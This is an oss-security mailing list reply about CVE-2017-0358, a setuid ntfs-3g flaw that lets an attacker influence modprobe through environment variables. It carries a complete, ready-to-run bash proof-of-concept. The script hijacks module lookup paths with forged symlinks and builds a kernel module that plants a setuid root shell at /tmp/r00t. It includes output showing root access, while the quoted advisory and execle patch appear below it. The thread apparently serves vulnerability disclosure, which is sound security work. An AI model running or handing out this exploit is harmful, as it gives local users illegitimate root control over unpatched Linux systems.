Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence
 vulnerability via environment variables

#!/bin/bash
echo "@...@...@...@...@...@...@...@...@...@...@...@...@...
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@...@...@...@...@...@...@...@...@...@...@...@...@...
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "

cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen
<kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");

int init_module(void) {
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want
to patch your system!\n");
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t;
/bin/chmod u+s /tmp/r00t", NULL };
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
  return 0;
}

void cleanup_module(void) {
  printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF

cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED:
linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null
1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have
root. Don't be evil :)"
/tmp/r00t

echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@...@...@...@...@...@...@...@...@...@...@...@...@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@...@...@...@...@...@...@...@...@...@...@...@...@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF


On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE does not not scrub the environment before
> executing modprobe to load the fuse module. This influence the behavior
> of modprobe (MODPROBE_OPTIONS environment variable, --config and
> --dirname options) potentially allowing for local root privilege
> escalation if ntfs-3g is installed setuid. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem is in the source since 2008, maybe before.
> The fix is easy, use execle instead of execl and pass NULL as
> environment variables.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref        2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c    2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
> --- ntfs-3g/src/ntfs-3g.c.ref   2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c       2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS



-- 
Regards,

Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen

View attachment "cve-2017-0358.sh.txt" of type "text/plain" (15934 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ